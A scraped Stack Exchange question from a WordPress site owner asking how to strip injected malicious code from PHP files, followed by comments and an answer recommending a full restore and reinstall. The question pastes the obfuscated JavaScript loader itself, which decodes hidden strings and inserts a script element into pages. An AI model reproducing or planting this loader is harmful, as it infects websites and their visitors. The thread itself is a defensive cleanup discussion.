6x31x44x44x6Dx6Bx58x44x68x52x51x4Cx47x73x4Fx6Bx77x6Fx6Cx32x4Ax63x4Bx56x77x34x56x74x77x35x66x43x67x51x6Cx6Cx44x73x4Fx67x77x72x6Ax44x74x4Dx4Fx2Bx4Bx6Dx73x36x77x35x39x6Ax77x37x37x43x68x31x44x43x73x44x52x69x77x34x33x43x6Fx33x6Ex43x73x63x4Fx59x77x36x6Cx72x77x72x70x33x58x73x4Bx36x77x72x6Fx70x77x71x6Ax43x6Dx63x4Fx30x77x70x55x4Fx63x6Cx48x44x6Bx69x76x43x75x48x4Cx44x6Bx63x4Bx72x77x35x66x44x70x45x76x44x70x32x76x43x75x38x4Bx32x4Ex67x54x44x69x38x4Fx6Ax77x37x44x44x73x63x4Fx4Fx46x73x4Bx49x77x70x62x44x6Ex58x59x37x77x6Fx38x39x52x77x44x43x69x63x4Bx58x62x47x56x6Ex49x42x62x44x6Dx4Dx4Fx45x77x35x62x43x6Bx38x4Fx4Dx52x4Dx4Fx77x64x4Dx4Bx50x77x35x54x44x6Dx32x45x31x77x72x37x44x6Ax57x37x44x74x73x4Fx32x41x63x4Fx56x77x36x67x65x55x54x77x2Fx77x34x4Dx73x77x71x6Bx2Bx77x37x48x44x75x4Dx4Bx6Ex77x72x38x31x4Ex4Dx4Bx58x77x36x33x44x74x6Ax66x43x67x73x4Bx6Bx77x37x64x39x77x6Fx50x43x6Ex56x70x42x77x36x31x6Fx42x4Dx4Bx39x65x78x63x4Dx55x73x4Fx73x4Ax73x4Bx2Bx61x38x4Bx53x55x31x42x4Ax53x4Dx4Fx74x66x48x70x51x77x70x6Ax44x6Fx73x4Fx63x77x35x6Ex44x6Fx63x4Fx52x77x35x45x6Bx77x71x4Cx44x6Fx4Dx4Fx42x77x6Fx35x35x77x34x6Ax44x69x33x34x75x63x38x4Fx43x44x48x6Ax43x68x33x6Ex44x6Ax43x48x44x67x73x4Bx52x4Bx73x4Fx6Fx77x35x76x43x68x77x78x64x77x36x4Cx43x6Ax38x4Fx5Ax57x67x49x61x77x71x44x43x68x4Dx4Fx51x66x63x4Fx6Cx77x36x50x43x75x73x4Fx74x4Bx38x4Fx2Bx77x35x6Ax44x76x38x4Bx46x65x32x59x57x57x73x4Fx36x47x33x72x44x75x41x3Dx3D","x73x68x69x66x74","x70x75x73x68","x55x44x50x4Dx49x55","x72x65x74x75x72x6Ex20x28x66x75x6Ex63x74x69x6Fx6Ex28x29x20","x7Bx7Dx2Ex63x6Fx6Ex73x74x72x75x63x74x6Fx72x28x22x72x65x74x75x72x6Ex20x74x68x69x73x22x29x28x20x29","x29x3B","x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","x61x74x6Fx62","","x72x65x70x6Cx61x63x65","x63x68x61x72x41x74","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x69x6Ex64x65x78x4Fx66","x6Cx65x6Ex67x74x68","x25","x73x6Cx69x63x65","x30x30","x74x6Fx53x74x72x69x6Ex67","x63x68x61x72x43x6Fx64x65x41x74","x58x70x44x42x61x53","x53x4Ax4Ex65x62x4B","x6Cx75x42x49x48x6B","x30x78x30","x43x31x25x4A","x30x78x31","x49x39x5Ax77","x74x79x70x65","x74x65x78x74x2Fx6Ax61x76x61x73x63x72x69x70x74","x61x73x79x6Ex63","x69x64","x30x78x32","x36x65x21x42","x30x78x33","x5Ax41x54x25","x30x78x34","x76x57x51x5D","x30x78x35","x30x78x36","x4Bx4Dx61x25","x30x78x37","x6Cx6Ax70x56"];var _0x69b4=[_0x6eea[0],_0x6eea[1],_0x6eea[2],_0x6eea[3],_0x6eea[4],_0x6eea[5],_0x6eea[6],_0x6eea[7],_0x6eea[8],_0x6eea[9],_0x6eea[10],_0x6eea[11],_0x6eea[12],_0x6eea[13],_0x6eea[14],_0x6eea[15],_0x6eea[16],_0x6eea[17],_0x6eea[18],_0x6eea[19],_0x6eea[20],_0x6eea[21],_0x6eea[22],_0x6eea[23],_0x6eea[24],_0x6eea[25],_0x6eea[26],_0x6eea[27],_0x6eea[28],_0x6eea[29],_0x6eea[30],_0x6eea[31],_0x6eea[32],_0x6eea[33],_0x6eea[34],_0x6eea[35],_0x6eea[36],_0x6eea[37],_0x6eea[38],_0x6eea[39],_0x6eea[40],_0x6eea[41],_0x6eea[42],_0x6eea[43],_0x6eea[44],_0x6eea[45],_0x6eea[46],_0x6eea[47],_0x6eea[48]];var _0x53ac=[_0x69b4[0],_0x69b4[1],_0x69b4[2],_0x69b4[3],_0x69b4[4],_0x69b4[5],_0x69b4[6],_0x69b4[7]];(function(_0x130bx3,_0x130bx4){var _0x130bx5=function(_0x130bx6){while(--_0x130bx6){_0x130bx3[_0x69b4[9]](_0x130bx3[_0x69b4[8]]())}};_0x130bx5(++_0x130bx4)}(_0x53ac,0x6b));var _0x4824=function(_0x130bx8,_0x130bx9){_0x130bx8= _0x130bx8- 0x0;var _0x130bxa=_0x53ac[_0x130bx8];if(_0x4824[_0x69b4[10]]=== undefined){(function(){var _0x130bxb=function(){var _0x130bxc;try{_0x130bxc= Function(_0x69b4[11]+ _0x69b4[12]+ _0x69b4[13])()}catch(_0x21cc70){_0x130bxc= window};return _0x130bxc};var _0x130bxd=_0x130bxb();var _0x130bxe=_0x69b4[14];_0x130bxd[_0x69b4[15]]|| (_0x130bxd[_0x69b4[15]]= function(_0x130bxf){var _0x130bx10=String(_0x130bxf)[_0x69b4[17]](/=+$/,_0x69b4[16]);for(var _0x130bx11=0x0,_0x130bx12,_0x130bx13,_0x130bx14=0x0,_0x130bx15=_0x69b4[16];_0x130bx13= _0x130bx10[_0x69b4[18]](_0x130bx14++);~_0x130bx13&& (_0x130bx12= _0x130bx11% 0x4?_0x130bx12* 0x40+ _0x130bx13:_0x130bx13,_0x130bx11++ % 0x4)?_0x130bx15+= String[_0x69b4[19]](0xff& _0x130bx12>> (-0x2* _0x130bx11 & 0x6)):0x0){_0x130bx13= _0x130bxe[_0x69b4[20]](_0x130bx13)};return _0x130bx15})}());var _0x130bx16=function(_0x130bx17,_0x130bx9){var _0x130bx18=,_0x130bx19=0x0,_0x130bx1a,_0x130bx1b=_0x69b4[16],_0x130bx1c=_0x69b4[16];_0x130bx17= atob(_0x130bx17);for(var _0x130bx1d=0x0,_0x130bx1e=_0x130bx17[_0x69b4[21]];_0x130bx1d< _0x130bx1e;_0x130bx1d++){_0x130bx1c+= _0x69b4[22]+ (_0x69b4[24]+ _0x130bx17[_0x69b4[26]](_0x130bx1d)[_0x69b4[25]](0x10))[_0x69b4[23]](-0x2)};_0x130bx17= decodeURIComponent(_0x130bx1c);for(var _0x130bx1f=0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx18[_0x130bx1f]= _0x130bx1f};for(_0x130bx1f= 0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f]+ _0x130bx9[_0x69b4[26]](_0x130bx1f% _0x130bx9[_0x69b4[21]]))% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a};_0x130bx1f= 0x0;_0x130bx19= 0x0;for(var _0x130bx20=0x0;_0x130bx20< _0x130bx17[_0x69b4[21]];_0x130bx20++){_0x130bx1f= (_0x130bx1f+ 0x1)% 0x100;_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f])% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a;_0x130bx1b+= String[_0x69b4[19]](_0x130bx17[_0x69b4[26]](_0x130bx20)^ _0x130bx18[(_0x130bx18[_0x130bx1f]+ _0x130bx18[_0x130bx19])% 0x100])};return _0x130bx1b};_0x4824[_0x69b4[27]]= _0x130bx16;_0x4824[_0x69b4[28]]= {};_0x4824[_0x69b4[10]]=  !!};var _0x130bx21=_0x4824[_0x69b4[28]][_0x130bx8];if(_0x130bx21=== undefined){if(_0x4824[_0x69b4[29]]=== undefined){_0x4824[_0x69b4[29]]=  !!};_0x130bxa= _0x4824[_0x69b4[27]](_0x130bxa,_0x130bx9);_0x4824[_0x69b4[28]][_0x130bx8]= _0x130bxa}else {_0x130bxa= _0x130bx21};return _0x130bxa};var _0x4739d5=[_0x4824(_0x69b4[30],_0x69b4[31]),_0x4824(_0x69b4[32],_0x69b4[33]),_0x69b4[34],_0x69b4[35],_0x69b4[36],_0x69b4[37],_0x4824(_0x69b4[38],_0x69b4[39]),_0x4824(_0x69b4[40],_0x69b4[41]),_0x4824(_0x69b4[42],_0x69b4[43]),_0x4824(_0x69b4[44],_0x69b4[43]),_0x4824(_0x69b4[45],_0x69b4[46]),_0x4824(_0x69b4[47],_0x69b4[48])];var _0x3be76d=[_0x4739d5[0x0],_0x4739d5[0x1],_0x4739d5[0x2],_0x4739d5[0x3],_0x4739d5[0x4],_0x4739d5[0x5],_0x4739d5[0x6],_0x4739d5[0x7],_0x4739d5[0x8],_0x4739d5[0x9],_0x4739d5[0xa],_0x4739d5[0xb]];var _0x4f3f17=[_0x3be76d[0x0],_0x3be76d[0x1],_0x3be76d[0x2],_0x3be76d[0x3],_0x3be76d[0x4],_0x3be76d[0x5],_0x3be76d[0x6],_0x3be76d[0x7],_0x3be76d[0x8],_0x3be76d[0x9],_0x3be76d[0xa],_0x3be76d[0xb]];var _0x4d0c89=[_0x4f3f17[0x0],_0x4f3f17[0x1],_0x4f3f17[0x2],_0x4f3f17[0x3],_0x4f3f17[0x4],_0x4f3f17[0x5],_0x4f3f17[0x6],_0x4f3f17[0x7],_0x4f3f17[0x8],_0x4f3f17[0x9],_0x4f3f17[0xa],_0x4f3f17[0xb]];var _0x572eac=[_0x4d0c89[0x0],_0x4d0c89[0x1],_0x4d0c89[0x2],_0x4d0c89[0x3],_0x4d0c89[0x4],_0x4d0c89[0x5],_0x4d0c89[0x6],_0x4d0c89[0x7],_0x4d0c89[0x8],_0x4d0c89[0x9],_0x4d0c89[0xa],_0x4d0c89[0xb]];var _0x2b0b54=[_0x572eac[0x0],_0x572eac[0x1],_0x572eac[0x2],_0x572eac[0x3],_0x572eac[0x4],_0x572eac[0x5],_0x572eac[0x6],_0x572eac[0x7],_0x572eac[0x8],_0x572eac[0x9],_0x572eac[0xa],_0x572eac[0xb]];(function(){var _0x130bx28=document[_0x2b0b54[0x1]](_0x2b0b54[0x0]);_0x130bx28[_0x2b0b54[0x2]]= _0x2b0b54[0x3];_0x130bx28[_0x2b0b54[0x4]]=  !!;_0x130bx28[_0x2b0b54[0x5]]= _0x2b0b54[0x6];_0x130bx28[_0x2b0b54[0x7]]= _0x2b0b54[0x8];var _0x130bx29=document[_0x2b0b54[0x9]](_0x2b0b54[0x0])[0x0];_0x130bx29[_0x2b0b54[0xb]][_0x2b0b54[0xa]](_0x130bx28,_0x130bx29)}());/**


I need to create bash script or using sed to remove only this malicious files, and not impacted to the other php code.







shell-script php malware wordpress






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Feb 28 at 8:35









Rui F Ribeiro

41.6k1483141




41.6k1483141










asked Feb 28 at 8:22









Widi AntoWidi Anto

32




32













  • So, search for a string in all the files and delete the files that contain a match?

    – 炸鱼薯条德里克
    Feb 28 at 8:24











  • Are you actually working with a compromised system?

    – Kusalananda
    Feb 28 at 8:28











  • @炸鱼薯条德里克 yes search for a string in all lthe files and delete the files that contain a match

    – Widi Anto
    Feb 28 at 8:30






  • 1





    If you have backups, take the system offline, restore a sufficiently-old backup, patch your system, reset database passwords, and go back online. This is not quite "nuke from orbit"-levels of safe, but much better than hoping you don't need to find hidden files, less scrambled payload, etc.

    – Ulrich Schwarz
    Feb 28 at 8:33






  • 1





    Related: How do I deal with a compromised server?

    – Kusalananda
    Feb 28 at 8:48



















  • So, search for a string in all the files and delete the files that contain a match?

    – 炸鱼薯条德里克
    Feb 28 at 8:24











  • Are you actually working with a compromised system?

    – Kusalananda
    Feb 28 at 8:28











  • @炸鱼薯条德里克 yes search for a string in all lthe files and delete the files that contain a match

    – Widi Anto
    Feb 28 at 8:30






  • 1





    If you have backups, take the system offline, restore a sufficiently-old backup, patch your system, reset database passwords, and go back online. This is not quite "nuke from orbit"-levels of safe, but much better than hoping you don't need to find hidden files, less scrambled payload, etc.

    – Ulrich Schwarz
    Feb 28 at 8:33






  • 1





    Related: How do I deal with a compromised server?

    – Kusalananda
    Feb 28 at 8:48

















So, search for a string in all the files and delete the files that contain a match?

– 炸鱼薯条德里克
Feb 28 at 8:24





So, search for a string in all the files and delete the files that contain a match?

– 炸鱼薯条德里克
Feb 28 at 8:24













Are you actually working with a compromised system?

– Kusalananda
Feb 28 at 8:28





Are you actually working with a compromised system?

– Kusalananda
Feb 28 at 8:28













@炸鱼薯条德里克 yes search for a string in all lthe files and delete the files that contain a match

– Widi Anto
Feb 28 at 8:30





@炸鱼薯条德里克 yes search for a string in all lthe files and delete the files that contain a match

– Widi Anto
Feb 28 at 8:30




1




1





If you have backups, take the system offline, restore a sufficiently-old backup, patch your system, reset database passwords, and go back online. This is not quite "nuke from orbit"-levels of safe, but much better than hoping you don't need to find hidden files, less scrambled payload, etc.

– Ulrich Schwarz
Feb 28 at 8:33





If you have backups, take the system offline, restore a sufficiently-old backup, patch your system, reset database passwords, and go back online. This is not quite "nuke from orbit"-levels of safe, but much better than hoping you don't need to find hidden files, less scrambled payload, etc.

– Ulrich Schwarz
Feb 28 at 8:33




1




1





Related: How do I deal with a compromised server?

– Kusalananda
Feb 28 at 8:48





Related: How do I deal with a compromised server?

– Kusalananda
Feb 28 at 8:48










1 Answer
1






active

oldest

votes


















1














The only solution is:




  1. enable maintenance mode

  2. save all Uploads (png/jpg..)

  3. clean out the current wp-directory

  4. reinstall the current Version

  5. upgrade to newest Version

  6. disable maintenance mode


I had this one time, trying to delete all infected files, but the attacker came back via several other file on regular order.
Save your time, do not try do find infected files, clean the Thing!






share|improve this answer



















  • 1





    Usually they are automated bots, not really humans doing the deed.

    – Rui F Ribeiro
    Feb 28 at 8:39











Your Answer








StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "106"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});














draft saved

draft discarded


















StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f503504%2fcleaning-infected-site-files-from-malicious-code%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









1














The only solution is:




  1. enable maintenance mode

  2. save all Uploads (png/jpg..)

  3. clean out the current wp-directory

  4. reinstall the current Version

  5. upgrade to newest Version

  6. disable maintenance mode


I had this one time, trying to delete all infected files, but the attacker came back via several other file on regular order.
Save your time, do not try do find infected files, clean the Thing!






share|improve this answer



















  • 1





    Usually they are automated bots, not really humans doing the deed.

    – Rui F Ribeiro
    Feb 28 at 8:39
















1














The only solution is:




  1. enable maintenance mode

  2. save all Uploads (png/jpg..)

  3. clean out the current wp-directory

  4. reinstall the current Version

  5. upgrade to newest Version

  6. disable maintenance mode


I had this one time, trying to delete all infected files, but the attacker came back via several other file on regular order.
Save your time, do not try do find infected files, clean the Thing!






share|improve this answer



















  • 1





    Usually they are automated bots, not really humans doing the deed.

    – Rui F Ribeiro
    Feb 28 at 8:39














1












1








1







The only solution is:




  1. enable maintenance mode

  2. save all Uploads (png/jpg..)

  3. clean out the current wp-directory

  4. reinstall the current Version

  5. upgrade to newest Version

  6. disable maintenance mode


I had this one time, trying to delete all infected files, but the attacker came back via several other file on regular order.
Save your time, do not try do find infected files, clean the Thing!






share|improve this answer













The only solution is:




  1. enable maintenance mode

  2. save all Uploads (png/jpg..)

  3. clean out the current wp-directory

  4. reinstall the current Version

  5. upgrade to newest Version

  6. disable maintenance mode


I had this one time, trying to delete all infected files, but the attacker came back via several other file on regular order.
Save your time, do not try do find infected files, clean the Thing!







share|improve this answer












share|improve this answer



share|improve this answer










answered Feb 28 at 8:36









gerhard d.gerhard d.

1,271412




1,271412








  • 1





    Usually they are automated bots, not really humans doing the deed.

    – Rui F Ribeiro
    Feb 28 at 8:39














  • 1





    Usually they are automated bots, not really humans doing the deed.

    – Rui F Ribeiro
    Feb 28 at 8:39








1




1





Usually they are automated bots, not really humans doing the deed.

– Rui F Ribeiro
Feb 28 at 8:39





Usually they are automated bots, not really humans doing the deed.

– Rui F Ribeiro
Feb 28 at 8:39


















draft saved

draft discarded




















































Thanks for contributing an answer to Unix & Linux Stack Exchange!


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f503504%2fcleaning-infected-site-files-from-malicious-code%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







Popular posts from this blog

How to make a Squid Proxy server?

Is this a new Fibonacci Identity?

19世紀